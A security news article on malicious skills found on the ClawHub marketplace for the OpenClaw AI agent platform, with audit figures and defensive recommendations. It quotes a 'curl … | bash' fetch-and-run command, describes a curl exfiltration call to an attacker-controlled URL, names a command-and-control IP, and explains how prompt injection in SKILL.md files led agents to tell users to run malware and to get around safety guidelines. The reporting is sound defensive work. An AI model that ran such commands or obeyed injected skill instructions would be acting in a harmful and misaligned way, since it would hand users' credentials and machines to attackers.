OpenClaw’s Top Skill Exposed as Malware: A Deep Dive into the AI Agent Security Breach
In a startling revelation, the most downloaded skill on OpenClaw’s ClawHub marketplace has been identified as functional malware, underscoring significant vulnerabilities within the AI agent ecosystem.
OpenClaw and ClawHub: An Overview
OpenClaw is an open-source AI agent platform that allows users to enhance their agents’ capabilities by installing plugins, known as skills, from its public marketplace, ClawHub. This system is designed to foster a collaborative environment where third-party developers can contribute and share tools to extend the functionality of AI agents.
Discovery of Malicious Skills
Security researcher @chiefofautism recently uncovered 1,184 malicious skills within ClawHub, with a single threat actor responsible for uploading 677 of these packages. This discovery highlights a severe supply chain vulnerability at the core of the AI agent ecosystem.
Exploitation of ClawHub’s Verification Process
ClawHub’s verification process required only a GitHub account older than one week for developers to publish skills. Attackers exploited this minimal barrier by flooding the registry with malicious skills disguised as legitimate tools, such as cryptocurrency trading bots, YouTube summarizers, and wallet trackers. These malicious skills were accompanied by professionally crafted documentation to appear credible.
Mechanism of the Attack
The malicious instructions were embedded within the `SKILL.md` files, containing AI prompt instructions designed to deceive the agent into advising users to execute harmful commands like:
“`
curl -sL malware_link | bash
“`
On macOS systems, executing this command deployed Atomic Stealer (AMOS), an infostealer capable of extracting browser passwords, SSH keys, Telegram sessions, cryptocurrency wallet keys, keychain data, and API keys stored in `.env` files. On other operating systems, the malware established a reverse shell, granting attackers full remote control over the compromised machine.
Case Study: What Would Elon Do? Skill
Cisco’s AI Defense team analyzed the top-ranked community skill on ClawHub, titled What Would Elon Do? This skill had been artificially promoted to the number one position. The analysis revealed nine security vulnerabilities: two critical, five high, and two medium.
The skill covertly exfiltrated user data by executing a `curl` command to an attacker-controlled server (`https://clawbub-skill.com/log`), with output redirected to `/dev/null` to evade detection. Additionally, it embedded prompt injection payloads to circumvent Claude’s safety guidelines, all while being downloaded thousands of times.
Historical Context and Previous Audits
This security crisis did not emerge suddenly. Koi Security had previously audited 2,857 ClawHub skills and identified 341 malicious entries, accounting for nearly 12% of the entire registry. Of these, 335 were linked to a coordinated campaign named ClawHavoc.
In a separate audit, Snyk identified 341 malicious skills, with a single publisher, hightower6eu, responsible for over 314 malicious packages, accumulating nearly 7,000 downloads. All identified malicious skills were connected to a common command-and-control server at `91.92.242.30`.
OpenClaw’s Response and Security Measures
In response to these findings, OpenClaw has partnered with Google’s VirusTotal to scan all uploaded skills. This collaboration aims to categorize skills as benign, suspicious, or malicious, with daily re-scans to detect any post-approval mutations.
This situation mirrors the AI-era equivalent of npm supply chain attacks, with a critical distinction: the malicious package operates within an AI agent possessing broad system permissions, file access, and the capability to autonomously execute terminal commands.
Implications for Organizations
Organizations utilizing OpenClaw in enterprise environments face compounded Shadow AI risks. Agent-executed actions often leave minimal audit trails and can bypass conventional proxy-based monitoring, making detection and mitigation more challenging.
Recommendations for Users and Developers
1. Review Installed Skills: Users should meticulously review their installed skills, removing any that appear suspicious or unnecessary.
2. Credential Management: Rotate credentials regularly to minimize the impact of potential compromises.
3. Implement Endpoint Protection: Deploy endpoint protection solutions capable of monitoring agent-level activities to detect and prevent unauthorized actions.
4. Enhance Verification Processes: Developers and marketplace operators should implement more stringent verification processes for publishing skills to prevent malicious actors from exploiting minimal barriers.
5. Continuous Monitoring: Establish continuous monitoring mechanisms to detect and respond to suspicious activities promptly.
Conclusion
The exposure of malicious skills within OpenClaw’s ClawHub marketplace serves as a stark reminder of the vulnerabilities inherent in rapidly evolving AI ecosystems. It underscores the necessity for robust security measures, continuous monitoring, and proactive responses to safeguard users and organizations from emerging threats.
